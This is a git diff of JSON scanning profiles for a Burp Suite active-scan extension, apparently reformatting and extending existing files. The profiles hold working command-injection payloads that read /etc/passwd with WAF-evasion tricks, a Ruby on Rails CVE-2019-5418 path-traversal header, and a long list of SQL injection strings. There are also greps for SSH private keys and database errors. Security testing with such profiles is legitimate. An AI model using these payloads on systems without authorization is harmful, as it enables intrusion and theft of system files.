Key","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Private_SSH_Key", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,([-]+BEGIN [^\\s]+ PRIVATE KEY[-])" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Private SSH Key", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/RCE-linux-Based.bb b/profiles/RCE-linux-Based.bb old mode 100644 new mode 100755 index b52f76c..13130e6 --- a/profiles/RCE-linux-Based.bb +++ b/profiles/RCE-linux-Based.bb @@ -1 +1,113 @@ -[{"Name":"RCE-linux-Based","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":[";cat /e${hahaha}tc/${heywaf}pas${catchthis}swd",";cat$u /etc$u/passwd$u",";{cat,/etc/passwd}",";cat\u003c/etc/passwd",";/???/??t /???/??ss??","%0Acat%20/etc/passwd",";cat$IFS/etc/passwd",";echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd",";who$@ami",";w\\ho\\am\\i",";w\"h\"o\"am\"i",";w\u0027h\u0027o\u0027am\u0027i","a;id;","|/bin/ls -al","a;/usr/bin/id;"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["root:x","www-data"],"Tags":["PathTraversal"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"RCE-linux-Based","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Path traversal payload: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,77,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,77,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":true}] \ No newline at end of file +[ + { + "ProfileName": "RCE-linux-Based", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@Sy3Omda", + "Payloads": [ + "true,;cat /e${hahaha}tc/${heywaf}pas${catchthis}swd", + "true,;cat$u /etc$u/passwd$u", + "true,;{cat,/etc/passwd}", + "true,;cat\u003c/etc/passwd", + "true,;/???/??t /???/??ss??", + "true,%0Acat%20/etc/passwd", + "true,;cat$IFS/etc/passwd", + "true,;echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd", + "true,;who$@ami", + "true,;w\\ho\\am\\i", + "true,;w\"h\"o\"am\"i", + "true,;w\u0027h\u0027o\u0027am\u0027i", + "true,a;id;", + "true,|/bin/ls -al", + "true,a;/usr/bin/id;" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,root:x", + "true,Or,www-data" + ], + "Tags": [ + "PathTraversal", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 2, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "RCE-linux-Based", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "Path traversal payload: \u003cbr\u003e \u003cpayload\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/RCE.bb b/profiles/RCE.bb index 7ec7950..f1e68e8 100755 --- a/profiles/RCE.bb +++ b/profiles/RCE.bb @@ -1 +1,102 @@ -[{"Name":"RCE","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":[" || id"," | id","; id"," \u0026\u0026 id"," \u0026 id"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,.*uid\u003d.*gid\u003d.*groups\u003d.*"],"Tags":["RCE","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":4,"MaxRedir":4,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"RCE","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"RCE found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "RCE", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true, || id", + "true, | id", + "true,; id", + "true, \u0026\u0026 id", + "true, \u0026 id" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,.*uid\u003d.*gid\u003d.*groups\u003d.*" + ], + "Tags": [ + "RCE", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 0, + "RedirType": 4, + "MaxRedir": 4, + "payloadPosition": 2, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "RCE", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "RCE found", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/RoR CVE-2019-5418 WAF Bypass.bb b/profiles/RoR CVE-2019-5418 WAF Bypass.bb new file mode 100755 index 0000000..c5543a5 --- /dev/null +++ b/profiles/RoR CVE-2019-5418 WAF Bypass.bb @@ -0,0 +1,70 @@ +[ + { + "ProfileName": "RoR CVE-2019-5418 WAF Bypass", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,/" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,root:x" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 4, + "MaxRedir": 3, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Ruby on Rails CVE-2019-5418", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [ + { + "type": "Request", + "match": "Accept: .*", + "replace": "Accept: ../../../../../../../../e*c/p*ss*d{{", + "regex": "Regex" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 65 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/RoR_CVE-2019-5418_WAF_Bypass.bb b/profiles/RoR_CVE-2019-5418_WAF_Bypass.bb index 432c1d3..950e40d 100755 --- a/profiles/RoR_CVE-2019-5418_WAF_Bypass.bb +++ b/profiles/RoR_CVE-2019-5418_WAF_Bypass.bb @@ -1 +1,70 @@ -[{"Name":"RoR_CVE-2019-5418_WAF_Bypass","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["/"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,root:x"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":3,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Ruby on Rails CVE-2019-5418","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Request","match":"Accept: .*","replace":"Accept: ../../../../../../../../e*c/p*ss*d{{","regex":"Regex"}],"VariationAttributes":[],"InsertionPointType":[65],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "RoR_CVE-2019-5418_WAF_Bypass", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,/" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,root:x" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 4, + "MaxRedir": 3, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Ruby on Rails CVE-2019-5418", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [ + { + "type": "Request", + "match": "Accept: .*", + "replace": "Accept: ../../../../../../../../e*c/p*ss*d{{", + "regex": "Regex" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 65 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Ruby on Rails CVE-2019-5418.bb b/profiles/Ruby on Rails CVE-2019-5418.bb new file mode 100755 index 0000000..5dd5917 --- /dev/null +++ b/profiles/Ruby on Rails CVE-2019-5418.bb @@ -0,0 +1,104 @@ +[ + { + "ProfileName": "Ruby on Rails CVE-2019-5418", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,/" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,root:x" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 4, + "MaxRedir": 3, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Ruby on Rails CVE-2019-5418", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [ + { + "type": "Request", + "match": "Accept: .*", + "replace": "Accept: ../../../../../../../../etc/passwd{{", + "regex": "Regex" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Ruby_on_Rails_CVE-2019-5418.bb b/profiles/Ruby_on_Rails_CVE-2019-5418.bb old mode 100644 new mode 100755 index 6bd9c6d..ccf66f9 --- a/profiles/Ruby_on_Rails_CVE-2019-5418.bb +++ b/profiles/Ruby_on_Rails_CVE-2019-5418.bb @@ -1 +1,104 @@ -[{"Name":"Ruby_on_Rails_CVE-2019-5418","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["/"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["root:x"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":3,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Ruby on Rails CVE-2019-5418","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Request","match":"Accept: .*","replace":"Accept: ../../../../../../../../etc/passwd{{","regex":"Regex"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Ruby_on_Rails_CVE-2019-5418", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,/" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,root:x" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 4, + "MaxRedir": 3, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Ruby on Rails CVE-2019-5418", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [ + { + "type": "Request", + "match": "Accept: .*", + "replace": "Accept: ../../../../../../../../etc/passwd{{", + "regex": "Regex" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/SQL_Message_Detected.bb b/profiles/SQL_Message_Detected.bb old mode 100644 new mode 100755 index bae06f8..4e5994d --- a/profiles/SQL_Message_Detected.bb +++ b/profiles/SQL_Message_Detected.bb @@ -1 +1,59 @@ -[{"Name":"SQL_Message_Detected","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(Exception (condition )?\\d+\\. Transaction rollback|com\\.frontbase\\.jdbc|org\\.h2\\.jdbc|Unexpected end of command in statement \\[\"|Unexpected token.*?in statement \\[|org\\.hsqldb\\.jdbc|CLI Driver.*?DB2|DB2 SQL error|\\bdb2_\\w+\\(|SQLSTATE.+SQLCODE|com\\.ibm\\.db2\\.jcc|Zend_Db_(Adapter|Statement)_Db2_Exception|Pdo[./_\\\\]Ibm|DB2Exception|Warning.*?\\Wifx_|Exception.*?Informix|Informix ODBC Driver|ODBC Informix driver|com\\.informix\\.jdbc|weblogic\\.jdbc\\.informix|Pdo[./_\\\\]Informix|IfxException|Warning.*?\\Wingres_|Ingres SQLSTATE|Ingres\\W.*?Driver|com\\.ingres\\.gcf\\.jdbc|Dynamic SQL Error|Warning.*?\\Wibase_|org\\.firebirdsql\\.jdbc|Pdo[./_\\\\]Firebird|Microsoft Access (\\d+ )?Driver|JET Database Engine|Access Database Engine|ODBC Microsoft Access|Syntax error \\(missing operator\\) in query expression|Driver.*? SQL[\\-\\_\\ ]*Server|OLE DB.*? SQL Server|\\bSQL Server[^\u0026lt;\u0026quot;]+Driver|Warning.*?\\W(mssql|sqlsrv)_|\\bSQL Server[^\u0026lt;\u0026quot;]+[0-9a-fA-F]{8}|System\\.Data\\.SqlClient\\.SqlException|(?s)Exception.*?\\bRoadhouse\\.Cms\\.|Microsoft SQL Native Client error \u0027[0-9a-fA-F]{8}|\\[SQL Server\\]|ODBC SQL Server Driver|ODBC Driver \\d+ for SQL Server|SQLServer JDBC Driver|com\\.jnetdirect\\.jsql|macromedia\\.jdbc\\.sqlserver|Zend_Db_(Adapter|Statement)_Sqlsrv_Exception|com\\.microsoft\\.sqlserver\\.jdbc|Pdo[./_\\\\](Mssql|SqlSrv)|SQL(Srv|Server)Exception|SQL syntax.*?MySQL|Warning.*?\\Wmysqli?_|MySQLSyntaxErrorException|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version|Unknown column \u0027[^ ]+\u0027 in \u0027field list\u0027|MySqlClient\\.|com\\.mysql\\.jdbc|Zend_Db_(Adapter|Statement)_Mysqli_Exception|Pdo[./_\\\\]Mysql|MySqlException|\\bORA-\\d{5}|Oracle error|Oracle.*?Driver|Warning.*?\\W(oci|ora)_|quoted string not properly terminated|SQL command not properly ended|macromedia\\.jdbc\\.oracle|oracle\\.jdbc|Zend_Db_(Adapter|Statement)_Oracle_Exception|Pdo[./_\\\\](Oracle|OCI)|OracleException|PostgreSQL.*?ERROR|Warning.*?\\Wpg_|valid PostgreSQL result|Npgsql\\.|PG::SyntaxError:|org\\.postgresql\\.util\\.PSQLException|ERROR:\\s\\ssyntax error at or near|ERROR: parser: parse error at or near|PostgreSQL query failed|org\\.postgresql\\.jdbc|Pdo[./_\\\\]Pgsql|PSQLException|SQL error.*?POS([0-9]+)|Warning.*?\\Wmaxdb_|DriverSapDB|com\\.sap\\.dbtech\\.jdbc|SQLite/JDBCDriver|SQLite\\.Exception|(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException|Warning.*?\\W(sqlite_|SQLite3::)|\\[SQLITE_ERROR\\]|SQLite error \\d+:|sqlite3.OperationalError:|SQLite3::SQLException|org\\.sqlite\\.JDBC|Pdo[./_\\\\]Sqlite|SQLiteException|Warning.*?\\Wsybase_|Sybase message|Sybase.*?Server message|SybSQLException|Sybase\\.Data\\.AseClient|com\\.sybase\\.jdbc)"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":true,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"SQL Text Detected","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "SQL_Message_Detected", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(Exception (condition )?\\d+\\. Transaction rollback|com\\.frontbase\\.jdbc|org\\.h2\\.jdbc|Unexpected end of command in statement \\[\"|Unexpected token.*?in statement \\[|org\\.hsqldb\\.jdbc|CLI Driver.*?DB2|DB2 SQL error|\\bdb2_\\w+\\(|SQLSTATE.+SQLCODE|com\\.ibm\\.db2\\.jcc|Zend_Db_(Adapter|Statement)_Db2_Exception|Pdo[./_\\\\]Ibm|DB2Exception|Warning.*?\\Wifx_|Exception.*?Informix|Informix ODBC Driver|ODBC Informix driver|com\\.informix\\.jdbc|weblogic\\.jdbc\\.informix|Pdo[./_\\\\]Informix|IfxException|Warning.*?\\Wingres_|Ingres SQLSTATE|Ingres\\W.*?Driver|com\\.ingres\\.gcf\\.jdbc|Dynamic SQL Error|Warning.*?\\Wibase_|org\\.firebirdsql\\.jdbc|Pdo[./_\\\\]Firebird|Microsoft Access (\\d+ )?Driver|JET Database Engine|Access Database Engine|ODBC Microsoft Access|Syntax error \\(missing operator\\) in query expression|Driver.*? SQL[\\-\\_\\ ]*Server|OLE DB.*? SQL Server|\\bSQL Server[^\u0026lt;\u0026quot;]+Driver|Warning.*?\\W(mssql|sqlsrv)_|\\bSQL Server[^\u0026lt;\u0026quot;]+[0-9a-fA-F]{8}|System\\.Data\\.SqlClient\\.SqlException|(?s)Exception.*?\\bRoadhouse\\.Cms\\.|Microsoft SQL Native Client error \u0027[0-9a-fA-F]{8}|\\[SQL Server\\]|ODBC SQL Server Driver|ODBC Driver \\d+ for SQL Server|SQLServer JDBC Driver|com\\.jnetdirect\\.jsql|macromedia\\.jdbc\\.sqlserver|Zend_Db_(Adapter|Statement)_Sqlsrv_Exception|com\\.microsoft\\.sqlserver\\.jdbc|Pdo[./_\\\\](Mssql|SqlSrv)|SQL(Srv|Server)Exception|SQL syntax.*?MySQL|Warning.*?\\Wmysqli?_|MySQLSyntaxErrorException|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version|Unknown column \u0027[^ ]+\u0027 in \u0027field list\u0027|MySqlClient\\.|com\\.mysql\\.jdbc|Zend_Db_(Adapter|Statement)_Mysqli_Exception|Pdo[./_\\\\]Mysql|MySqlException|\\bORA-\\d{5}|Oracle error|Oracle.*?Driver|Warning.*?\\W(oci|ora)_|quoted string not properly terminated|SQL command not properly ended|macromedia\\.jdbc\\.oracle|oracle\\.jdbc|Zend_Db_(Adapter|Statement)_Oracle_Exception|Pdo[./_\\\\](Oracle|OCI)|OracleException|PostgreSQL.*?ERROR|Warning.*?\\Wpg_|valid PostgreSQL result|Npgsql\\.|PG::SyntaxError:|org\\.postgresql\\.util\\.PSQLException|ERROR:\\s\\ssyntax error at or near|ERROR: parser: parse error at or near|PostgreSQL query failed|org\\.postgresql\\.jdbc|Pdo[./_\\\\]Pgsql|PSQLException|SQL error.*?POS([0-9]+)|Warning.*?\\Wmaxdb_|DriverSapDB|com\\.sap\\.dbtech\\.jdbc|SQLite/JDBCDriver|SQLite\\.Exception|(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException|Warning.*?\\W(sqlite_|SQLite3::)|\\[SQLITE_ERROR\\]|SQLite error \\d+:|sqlite3.OperationalError:|SQLite3::SQLException|org\\.sqlite\\.JDBC|Pdo[./_\\\\]Sqlite|SQLiteException|Warning.*?\\Wsybase_|Sybase message|Sybase.*?Server message|SybSQLException|Sybase\\.Data\\.AseClient|com\\.sybase\\.jdbc)" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": true, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "SQL Text Detected", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/SQLi-Error-SQLmap.bb b/profiles/SQLi-Error-SQLmap.bb index eca1504..03a417f 100755 --- a/profiles/SQLi-Error-SQLmap.bb +++ b/profiles/SQLi-Error-SQLmap.bb @@ -1 +1,245 @@ -[{"Name":"SQLi-Error-SQLmap","Enabled":true,"Scanner":1,"Author":"@GochaOqradze","Payloads":["\u0027","\u0027\u0027","`","``",",","\"","\"\"","/","//","\\","\\\\",";","\u0027 or \"","-- or # ","\u0027 OR \u00271","\u0027 OR 1 -- -","\" OR \"\" \u003d \"","\" OR 1 \u003d 1 -- -","\u0027 OR \u0027\u0027 \u003d \u0027","\u0027\u003d\u0027","\u0027LIKE\u0027","\u0027\u003d0--+"," OR 1\u003d1","\u0027 OR \u0027x\u0027\u003d\u0027x","\u0027 AND id IS NULL; --","\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027UNION SELECT \u00272","%00","/*…*/ ","+","||","%","@variable","@@variable","#","AND 1","AND 0","AND true","AND false","1-false","1-true","1*56","-2","1\u0027 ORDER BY 1--+","1\u0027 ORDER BY 2--+","1\u0027 ORDER BY 3--+","1\u0027 ORDER BY 1,2--+","1\u0027 ORDER BY 1,2,3--+","1\u0027 GROUP BY 1,2,--+","1\u0027 GROUP BY 1,2,3--+","\u0027 GROUP BY columnnames having 1\u003d1 --","-1\u0027 UNION SELECT 1,2,3--+","\u0027 UNION SELECT sum(columnname ) from tablename --","-1 UNION SELECT 1 INTO @,@","-1 UNION SELECT 1 INTO @,@,@","1 AND (SELECT * FROM Users) \u003d 1","\u0027 AND MID(VERSION(),1,1) \u003d \u00275\u0027;","\u0027 and 1 in (select min(name) from sysobjects where xtype \u003d \u0027U\u0027 and name \u003e \u0027.\u0027) --",",(select * from (select(sleep(10)))a)","%2c(select%20*%20from%20(select(sleep(10)))a)","\u0027;WAITFOR DELAY \u00270:0:10\u0027--","#\t Hash comment","/*","-- -",";%00","`"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,Exception (condition )?\\d+\\. Transaction 